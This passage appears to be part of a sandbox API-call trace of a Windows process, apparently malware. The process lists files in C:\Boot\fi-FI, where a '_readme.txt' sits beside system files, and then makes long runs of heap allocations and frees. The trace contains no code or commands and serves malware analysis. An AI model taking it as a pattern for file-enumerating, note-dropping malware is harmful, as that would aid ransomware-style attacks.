hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.743] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.743] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.743] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.743] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8adacd0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.743] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8adacd0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8adacd0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8adacd0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.743] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.744] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 